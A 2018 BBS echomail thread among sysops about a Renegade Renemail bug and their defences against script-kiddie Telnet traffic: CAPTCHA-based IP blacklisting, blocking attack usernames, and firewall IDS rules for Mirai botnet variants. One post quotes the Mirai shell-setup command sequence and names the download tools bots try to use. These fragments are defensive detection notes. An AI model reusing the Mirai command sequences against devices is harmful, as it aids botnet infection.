• Bug in Renegade's Renemail

    From Nick Andre@1:229/426 to All on Sunday, June 24, 2018 10:51:05
    There is a serious bug in Renegade's "Renemail" utility that I just fixed, with regards to point-systems.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)
  • From Sean Dennis@1:18/200 to Nick Andre on Monday, June 25, 2018 14:50:04
    Hello Nick,

    24 Jun 18 10:51 at you wrote to All:

    There is a serious bug in Renegade's "Renemail" utility that I just
    fixed, with regards to point-systems.

    You know, I just discovered I had the Renegade source (don't ask me which version) hiding out somewhere and compiled for S&G. It worked. Another project to put aside...

    Later,
    Sean

    ... I have a love interest in every one of my films - a gun. - Schwarzenegger --- GoldED+/LNX 1.1.5-b20170303
    * Origin: Outpost BBS * Limestone, TN, USA (1:18/200)
  • From Nick Andre@1:229/426 to Sean Dennis on Tuesday, June 26, 2018 02:49:36
    On 25 Jun 18 14:50:04, Sean Dennis said the following to Nick Andre:

    There is a serious bug in Renegade's "Renemail" utility that I just fixed, with regards to point-systems.

    You know, I just discovered I had the Renegade source (don't ask me which version) hiding out somewhere and compiled for S&G. It worked. Another project to put aside...

    I'm using the Y2KA2 source, with a ton of my own modifications.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)
  • From Sean Dennis@1:18/200 to Nick Andre on Tuesday, June 26, 2018 13:13:15
    Hello Nick,

    26 Jun 18 02:49 at you wrote to me:

    I'm using the Y2KA2 source, with a ton of my own modifications.

    I think that's the source code I have. I don't remember where I put it now but I'll have to dig it up and see. I admit, would be fun to hack at Renegade a bit just for S&G.

    Later,
    Sean

    ... If a million people say a foolish thing, it is still a foolish thing.
    --- GoldED+/LNX 1.1.5-b20170303
    * Origin: Outpost BBS * Limestone, TN, USA (1:18/200)
  • From Nick Andre@1:229/426 to Sean Dennis on Tuesday, June 26, 2018 15:09:12
    On 26 Jun 18 13:13:15, Sean Dennis said the following to Nick Andre:

    I'm using the Y2KA2 source, with a ton of my own modifications.

    I think that's the source code I have. I don't remember where I put it now but I'll have to dig it up and see. I admit, would be fun to hack at Reneg a bit just for S&G.

    Off the top of my head, the two fundimental modifications I made were to remove the message-database limitations and remove some new-user questions
    I didn't feel like asking callers... but the most interesting change was a
    few lines of code to add a hook to catch script kiddies. I had no choice;
    my network was getting totally slammed with rogue Telnet traffic but I did not want to inconvenience BBS callers by having to call on a different port.

    If a non-ANSI user calls here, I know that 99% of the time its a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a
    seperate process that resets the kill file once a week in the case of a false-positive.

    That has significantly reduced the amount of rogue Telnet traffic here and because the BBS does not load on blacklisted connections, the daily stats and logs are much more accurate.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)
  • From Gene Buckle@1:138/142 to Nick Andre on Tuesday, June 26, 2018 14:30:35
    Re: Re: Bug in Renegade's Renemail
    By: Nick Andre to Sean Dennis on Tue Jun 26 2018 03:09 pm

    If a non-ANSI user calls here, I know that 99% of the time its a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a
    seperate process that resets the kill file once a week in the case of a false-positive.

    Nice solution! I just tweaked Synchronet's logon.js (login?) to terminate the connection if the user name was any number of ones that the skids typically use. (root, admin, etc..)

    g.
    --- SBBSecho 2.27-Win32
    * Origin: The Retro Archive (1:138/142)
  • From mark lewis@1:3634/12.73 to Nick Andre on Thursday, June 28, 2018 08:31:34

    On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:

    If a non-ANSI user calls here, I know that 99% of the time its a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If
    you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a seperate process that resets the kill file once a
    week in the case of a false-positive.

    that's similar to what i do here except i use an IDS on my firewall... ISP issued modems are shit... just barely enough to call them a modem/firewall/router... we use our's in bridge mode and have our own dedicated
    firewall/router machine protecting the three networks here... this firewall being one of smoothwall, ipfire, pfSense and similar... we chose ours because we can customize it if we choose... the IDS comes with but the automated dropping of unwanted connections is our custom addition...

    since i have frontdoor running and answering the connection requests on telnet,
    it answers and logs the "DFRS" (data from ring signal)... that should be the caller-id stuff but on telnet, with these automated mirai variants, they just spew their credentials and then try to set up their shell... it is because of frontdoor that i was able to see what was going on... most bbses hide that data... so anyway, once i knew what was going on, i wrote a few IDS rules to detect these connections... i followed a few rules, though...

    1. we don't care what name and password they spew.
    2. we DO care if they try to set up their shell.
    3. shell setup is generally always the same
    enable.system.shell.sh
    (dots used for spaces so as to not trip IDS)
    4. after the above they generally try to load busybox
    with some fake module or program call. this call
    is simply a delimeter so they can see when their
    attempt is finished.
    5. sometimes, instead of loading busybox, they try
    to download scripts from somewhere else via tools
    like fgrep, curl, wget, ftpget, tftp, and even echo.

    so with the above, we have five IDS rules... one to detect each stage of the command shell setup attempt... that's really all it takes but we do track the fake module or program names they try to initiate... that's how the thing got its name and how the skiddies keep them separated...

    in 2016, there were 12 unique variants.
    in 2017, there were 30 new unique variants.
    in 2018, there have been at least 73 new unique variants.

    the most notable thing is that by running the IDS, we're able to detect these attempts and stop them in the firewall before they even get a chance to get into the network... sure, the initial part is being feed to the mailer but as soon as the IDS qualifies the traffic as a mirai variant, it drops the connection via iptables rules... right now we have rules for each of the unique
    modules which we used as our trigger to block the connection but it is just about to the point where we don't even care about them any more... we could drop the connection just based on the attempt to set up the shell which would reduce our rules set to only 4 rules instead of the current 115 we have in place...

    there used to be a lot more attempts as the skiddies attempted to build their botnets... those attempts have dropped a lot since the beginning... there's only maybe 5 unique variants that are active... at least going by what is seen over here... sometimes an older one will come around and we still see some mirai attempts... one of the funniest ones is using "anarchy" as their fake module but the actual funny part is they're trying to load "SH" for their shell
    instead of "sh"... we all know how *nix systems are case sensitive so we know this won't work but it could be a second round attempt where the first round may have gotten in and created a "SH" shell... i dunno but i'm glad to be having my firewall performing this analysis and blocking rather than submitting
    my server to the abuse... that one IDS installation on the firewall is protecting a number of bbses and they're very happy they don't have to do the work of analyzing and blocking these skiddie attempts...

    at one point in time, our firewall was blocking over 4000 unique IPs that were known to be infected with a mirai variant... the attempts have fallen off a whole lot and today we're tracking less than 1000 unique IPs hitting here... i want to suspect the skids are actually reading their logs and seeing what BBS and mailer logons look like... i want to suspect they are adjusting their code to detect those and drop the connection on their own since they can't get in and do anything... i dunno... maybe it is all just a dream...

    )\/(ark

    Always Mount a Scratch Monkey
    Do you manage your own servers? If you are not running an IDS/IPS yer doin' it wrong...
    ... be kind to your four footed friends...
    ---
    * Origin: (1:3634/12.73)
  • From Nick Andre@1:229/426 to Mark Lewis on Thursday, June 28, 2018 18:54:13
    On 28 Jun 18 08:31:34, Mark Lewis said the following to Nick Andre:

    If a non-ANSI user calls here, I know that 99% of the time its a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a seperate process that resets the kill file once a week in the case of a false-positive.

    that's similar to what i do here except i use an IDS on my firewall... ISP

    [...]

    An interesting read. Yes, ISP modems are garbage. Totally agreed.

    Ever since I wrote the "hooks" into Renegade to do what I wanted it to do, the statistics are more accurate, the computer is not needlessly loading the BBS on a call, etc... its just much more efficient here.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)